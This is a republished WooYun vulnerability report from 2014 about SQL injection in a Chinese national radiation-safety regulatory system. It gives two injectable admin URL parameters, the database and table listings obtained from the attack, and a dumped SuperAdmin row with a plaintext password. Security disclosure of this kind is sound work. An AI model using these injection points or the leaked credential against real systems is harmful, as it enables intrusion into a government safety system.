国家核技术利用辐射安全监管系统SQl注入

admin 2015年6月20日15:21:14评论258 views字数 243阅读0分48秒阅读模式
摘要

2014-09-21: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商已经确认,细节仅向厂商公开
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2014-76588

漏洞标题: 国家核技术利用辐射安全监管系统SQl注入

相关厂商: 国家核技术利用辐射安全监管

漏洞作者: 爱Gail

提交时间: 2014-09-21 12:00

公开时间: 2014-11-03 12:02

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 12

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: Mysql 注射技巧

1人收藏


漏洞详情

披露状态:

2014-09-21: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商已经确认,细节仅向厂商公开
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

国家核技术利用辐射安全监管系统SQl注入

详细说明:

注入URL:

**.**.**.**/admin/singlelogin.php?submit=1&loginId=1

**.**.**.**/admin/list_ipAddressPolicy.php?GroupId=1

国家核技术利用辐射安全监管系统SQl注入

国家核技术利用辐射安全监管系统SQl注入

available databases [6]:

[*] information_schema

[*] iscserver

[*] iscserver_bak

[*] mysql

[*] performance_schema

[*] test

Database: iscserver

[138 tables]

+-------------------------+

| Admin |

| ApplyUser |

| AutoRouteOutInfo |

| BandIPMac |

| CRLPublish |

| CertCRL |

| CertReq |

| ClientAppLog |

| Configure |

| CurrentFlowStat |

| CurrentFlowStatBak |

| DEVICE_CONFIG |

| Domain |

| DomainAdmin |

| EMailConfig |

| ExpiredISCUserTable |

| FireWall |

| GWCurrentFlowStat |

| GWCurrentFlowStatBak |

| GWHistoryFlowStat |

| GWLink |

| GWLinkExtInfo |

| GroupNoCachePolicy |

| HWFeature |

| HWFeatureReq |

| HistoryFlowStat |

| HostCount |

| ISCGWTable |

| ISCGroupAnticrack |

| ISCGroupTable |

| ISCGroupTimePolicy |

| ISCGroupUserLoginPolicy |

| ISCIPPool |

| ISCMemberTable |

| ISCOnLineUser |

| ISCRoute |

| ISCSPPolicy |

| ISCSSRoute |

| ISCUpdate |

| ISCUserActivity |

| ISCUserActivityLog |

| ISCUserTable |

| ISCWebPluginPolicy |

| ISCWebPluginRule |

| ISCWorkloadTable |

| ISC_Account_Template |

| ISC_Algorithm_Para |

| ISC_Auth_Algorithm |

| ISC_Auth_Method |

| ISC_Method_Para |

| IpAddressPolicy |

| Ipsec_Tunnel |

| LogTable |

| LogType |

| MT_IpPool |

| MailAdminTable |

| Menu_Style |

| MobileInfoTable |

| NAT |

| NATConfig |

| NatMap |

| Policy |

| PortMap |

| PortalMap |

| ProgramConf |

| ProxyBackDomainTable |

| ProxyConfigTable |

| ProxyMapTable |

| ProxyPolicyTable |

| Radius |

| ReplacePatternTable |

| ResourceCategoryTable |

| ResourceIconTable |

| Rule |

| RuleViolateLog |

| SToSRule |

| SingleLoginUser |

| SinglePointLogin |

| Sproxy_App |

| Sproxy_Policy |

| SystemAlarmLogTable |

| SystemAlarmTable |

| Tunnel |

| TunnelRoute |

| TunnelRouteMasq |

| UrlCount |

| UrlLogRules |

| UrlLogTable |

| UserLoginAnticrack |

| UserNameCount |

| VirtualSiteTable |

| WebAppAccount |

| WebAppDesktop |

| WebAppGroup |

| WebPolicyTable |

| WebServer |

| cp_AntiSpyware |

| cp_AntiVirus |

| cp_FireWall |

| cp_NACPolicy |

| cp_OS |

| cp_OSFWpolicy |

| cp_OSpath |

| cp_Program |

| fw_AddressInterpret |

| fw_AddressMasquerading |

| fw_BandIPMac |

| fw_BuildIP |

| fw_DAddressMasquerading |

| fw_FireWall |

| fw_NatMap |

| fw_PortMap |

| fw_Resource |

| fw_SAddressMasquerading |

| g_WebServer |

| hot_device |

| u_Admin |

| u_Apply |

| u_ApplyCardType |

| u_ApplyConfig |

| u_ApplyDept |

| u_ApplyLei |

| u_ApplyOffice |

| u_ApplyRole |

| u_ApplyUsePurpose |

| u_Autoshenhe |

| u_Dzzy |

| u_LogTable |

| u_Mail |

| u_Nat |

| u_Tu_jdt |

| u_Tu_zxt |

| u_Web_gonggao |

| u_Web_iptong |

| u_Web_wenti |

| u_Web_wentihf |

| u_Webconf |

| u_shenhePolicy |

+-------------------------+

Database: iscserver

Table: Admin

[1 entry]

+---------+--------+--------+------------+--------------------+-----------+

| AdminId | State | Passwd | AdminName | EmailAddr | Privilege |

+---------+--------+--------+------------+--------------------+-----------+

| 1 | active | dep501 | SuperAdmin | rsms@**.**.**.** | abcde |

+---------+--------+--------+------------+--------------------+-----------+

漏洞证明:

国家核技术利用辐射安全监管系统SQl注入

国家核技术利用辐射安全监管系统SQl注入

修复方案:

他们懂的

版权声明:转载请注明来源 爱Gail@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-24 08:26

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-09-20 19:48 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈,看世间千姿百态...)

    2

    擦 坑爹的标题...

  2. 2014-09-24 17:03 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    0

    我以为是核弹发射系统呢

  3. 2014-11-03 12:06 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心,方得始终。)

    0

    被你弄出核辐射了怎么办

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin